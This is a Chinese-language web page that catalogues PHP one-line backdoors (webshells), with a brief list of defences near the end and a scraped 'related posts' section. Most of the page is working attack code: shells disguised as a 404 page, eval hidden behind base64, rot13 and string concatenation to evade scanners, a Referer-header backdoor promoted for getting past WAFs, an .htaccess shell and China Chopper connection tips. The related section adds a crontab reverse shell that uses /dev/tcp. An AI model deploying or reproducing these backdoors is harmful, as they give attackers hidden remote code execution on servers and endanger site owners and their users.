PHP一句話後門
1、利用404頁面隱藏一句話
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> </body></html> <?php @preg_replace("/[pageerror]/e",$_POST['error'],"saft"); header('HTTP/1.1 404 Not Found'); ?>
2、無特徵隱藏一句話
<?php session_start(); $_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']); $_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a'); /* 將$_POST['code']的內容賦值給$_SESSION['theCode'],然後執行$_SESSION['theCode'],亮點是沒有特徵碼。用掃描工具來檢查程式碼的話,是不會報警的,達到目的了。 */
3、高階隱藏一句話
$_GET[a]($_GET[b]);
利用方法:
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w% 29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
/*
執行後當前目錄生成c.php一句話木馬,當傳參a為eval時會報錯木馬生成失敗,為assert時同樣報錯,但會生成木馬,真可謂不可小視,簡簡單單的一句話,被延伸到這般應用。
*/
4、層級請求,編碼執行一句話
/*此方法用兩個檔案實現 檔案1 */ <?php //1.php header('Content-type:text/html;charset=utf-8'); parse_str($_SERVER['HTTP_REFERER'], $a); if(reset($a) == '10' && count($a) == 9) { eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6))))); } 檔案2 <?php //2.php header('Content-type:text/html;charset=utf-8'); //要執行的程式碼 $code = <<<CODE phpinfo(); CODE; //進行base64編碼 $code = base64_encode($code); //構造referer字串 $referer = "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i="; //後門url $url = 'http://localhost/test1/1.php'; $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => FALSE, CURLOPT_RETURNTRANSFER => TRUE, CURLOPT_REFERER => $referer ); curl_setopt_array($ch, $options); echo curl_exec($ch); /* 通過HTTP請求中的HTTP_REFERER來執行經過base64編碼的程式碼,來達到後門的效果,一般waf對referer這些檢測要鬆一點,或者沒有檢測。用這個思路bypass waf不錯。 */
5、三個變形的一句話木馬
第一個
<?php ([email protected]$_GET[2])[email protected]$_($_POST[1])?>
在菜刀裡寫http://site/1.php?2=assert密碼是1
第二個
<?php
$_="";
$_[+""]='';
$_="$_"."";
$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");
?>
<?php ${'_'.$_}['_'](${'_'.$_}['__']);?>
在菜刀裡寫http://site/2.php?_=assert&__=eval($_POST['pass']) 密碼是pass。
如果你用菜刀的附加資料的話更隱蔽,或者用其它注射工具也可以,因為是post提交的。
第三個
($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add');
str_rot13(‘riny’)即編碼後的eval,完全避開了關鍵字,又不失效果,讓人吐血!
6、.htaccess做木馬後門
AddType application/x-httpd-php .htaccess
###### SHELL ###### 這裡寫上你的後門吧###### LLEHS ######
7、特殊php一句話
1、
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$hh("/[discuz]/e",$_POST['h'],"Access");
//菜刀一句話
2、
$filename=$_GET['xbid'];
include ($filename);
//危險的include函式,直接編譯任何檔案為php格式執行
3、
$reg="c"."o"."p"."y";
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
//重新命名任何檔案
4、
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$gzid("/[discuz]/e",$_POST['h'],"Access");
//菜刀一句話
5、include ($uid);
//危險的include函式,直接編譯任何檔案為php格式執行,POST www.xxx.com/index.php?uid=/home/www/bbs/image.gif
//gif插一句話
6、典型一句話
程式後門程式碼
<?php eval_r($_POST[sb])?>
程式程式碼
<?php @eval_r($_POST[sb])?>
//容錯程式碼
程式程式碼
<?php assert($_POST[sb]);?>
//使用lanker一句話客戶端的專家模式執行相關的php語句
程式程式碼
<?$_POST['sa']($_POST['sb']);?>
程式程式碼
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
程式程式碼
<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>
//使用這個後,使用菜刀一句話客戶端在配置連線的時候在"配置"一欄輸入
程式程式碼
<O>[email protected]_r($_POST1);</O>
程式程式碼
<script language="php">@eval_r($_POST[sb])</script>
//繞過<?限制的一句話
最後,如何應對php後門
1、對PHP程式編寫要有安全意識
2、伺服器日誌檔案要經常看,經常備份
3、對每個站點進行嚴格的許可權分配
4、對動態檔案及目錄經常批量安全審查
5、學會如何進行手工防毒《即行為判斷查殺》
6、時刻關注,或滲入活躍的網路安全營地
7、對伺服器環境層級化處理,哪怕一個函式也可做規則
相關推薦
那些強悍的PHP一句話後門
強悍的PHP一句話後門 常用一: <?php $a=range(1,200);$b=chr($a[96-1+1]).chr($a[114-1+1]).chr($a[114-1+1]).chr($a[100-1+1]).chr($a[113-1+1]).ch
PHP一句話後門
1、利用404頁面隱藏一句話 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title>
PHP一句話後門過狗姿勢萬千之後門構造與隱藏
第二章節主要帶給大家一些後門構造思路,與安全狗檔案特徵檢測的機制。 另外強調一下,這篇文章需要大家對於php有一定的認識。 本章節分為三大部分,第一部分針對初級,分析菜刀php程式碼的執行過程,較基礎;第二部分主要總結一些可以利用的後門姿勢,這部分我主要給大家分享一些蒐集
php 一句話木馬、後門
強悍的PHP一句話後門 這類後門讓網站、伺服器管理員很是頭疼,經常要換著方法進行各種檢測,而很多新出現的編寫技術,用普通的檢測方法是沒法發現並處理的。今天我們細數一些有意思的PHP一句話木馬。 利用404頁面隱藏PHP小馬: <strong><!DOC
PHP網站掃描一句話後門WebShell指令碼原始碼
$matches = array( '/mb_ereg_replace\([\'\*\s\,\.\"]+\$_(?:GET|POST|REQUEST|COOKIE|SERVER)\[[\'\"].*?[\'\"][\]][\,\s\'\"]+e[\'\"]'/is, '/pre
表弟讓整理的各種一句話後門= =
信息安全 php asp php 利用404頁面隱藏PHP小馬<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</titl
eval與php一句話的關系
IV 技術 TP AR inf HP request 引用 完全 part1 首先我們知道,eval能執行php代碼,最常見的php一句話也是用eval關鍵字的。 <?php @eval($_GET["code"])?> Part2 在T00ls論壇混的
PHP WeBaCoo後門學習筆記
WeBaCoo (Web Backdoor Cookie) 是一款隱蔽的指令碼類Web後門工具。設計理念是躲避AV、NIDS、IPS、網路防火牆和應用防火牆的查殺,提供混淆和原始兩種後門程式碼(原始程式碼較難檢測)。WebBaCoo 使用HTTP響應頭傳送命令執行的
PHP一句話木馬Webshell變形免殺總結
0×00 前言 大部分Webshell查殺工具都是基於關鍵字特徵的,通常他們會維護一個關鍵字列表,以此遍歷指定副檔名的檔案來進行掃描,所以可能最先想到的是各種字串變形,下面總結了一些小的方法,各種不足之前還請看官拍磚. 0×01 字串上的舞蹈 一
crontab一句話後門分析
正常版本 (crontab -l;echo '*/60 * * * * exec 9<> /dev/tcp/127.0.0.1/8888;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i')|cro
PHP 一句話木馬
特殊 技術 函數返回 code 分享 span ima rap .com eval 函數 eval() 函數把字符串按照 PHP 代碼來計算 該字符串必須是合法的 PHP 代碼,且必須以分號結尾 如果沒有在代碼字符串中調用 return 語句,則返回 NU
繞過網站安全狗攔截,上傳Webshell技巧總結(附免殺PHP一句話)
這篇文章我介紹一下我所知道的繞過網站安全狗上傳WebShell的方法。 思路是:修改HTTP請求,構成畸形HTTP請求,然後繞過網站安全狗的檢測。 廢話不多說,切入正題。。。。 1、實驗環境: Windows Server 2003、 Apache/2.4.18、PHP/5.3.29、網站安全狗(Apac
PHP一句話木馬研究
quest params slide tin gin 相同 handler 函數參數 方法 最近在研究PHP一句話後門,查閱了很多大佬的博客,並從中衍生出了一些可用的方法。 現總結如下: 方案一:回調函數 回調函數:Callback (即call then back 被主
php -- cookie 後門
ttp://blog.sucuri.net/2014/04/joomla-plugin-constructor-backdoor.html https://gist.github.com/PhilETaylor/8045002 http://www.freebuf.com
PHP混淆後門解剖分析(反抓流量、加密結果)
開始前的例行叨叨:這個後門樣本收集於2018紅帽杯線下決賽,看到有其他分析收集於自己的伺服器,悲劇了(手動笑哭),貌似藍帽杯也有。除錯了很久,被逼著專門學了半天正則表示式,但感覺寫完這篇文章就忘乾淨了。馬的特殊性就是,靠特別麻煩,讓你在現場心態崩潰,除錯不出來,而且抓到流量不
一句話後門中eval和assert的區別
eval函式中引數是字元,如: eval('echo 1;'); assert函式中引數為表示式 (或者為函式),如: assert(phpinfo()) assert(eval('echo 1;')); 直接傳遞普通程式碼是無法執行的,如:assert('
PHP 回調後門筆記
回調後門在php中 存在回調函數參數的函數,都有可能作為後門比如array_map , array_filter 這類數組操作的回調函數,但是在安全狗下會被殺掉但是uasort 這類函數不會被殺掉。php5.4.8之後的assert在5.4.8之後,assert函數由一個參數,變成了兩個參數。增加了一個可選參
手把手教你編寫一個簡單的PHP模塊形態的後門
cpp rest xtu job ring 事先 們的 original call 看到Freebuf 小編發表的用這個隱藏於PHP模塊中的rootkit,就能持久接管服務器文章,很感興趣,苦無作者沒留下PoC,自己研究一番,有了此文 0×00. 引言 PHP是一個非常流行
整理的最新WebSHell (php過狗一句話,過狗菜刀,2016過狗一句話,2016php免殺一句話)
一句話木馬中國菜刀下載,基於原版中國菜刀優化版20160309.下載地址:http://download.csdn.net/detail/settoken/9457567https://pan.baidu.com/s/1jHoJxHWChina chopperhttps://pan.baidu.com/s/1
給你的PHP大馬添加後門(黑吃黑)
測試 hacks bubuko 環境 div muc i94 測試環境 dmi Part 1 引子 說什麽好呢,發個圖就當個引子好了。 Part 2 XSS平臺 創建項目 選擇類型 xss代碼 小實驗,刷新代碼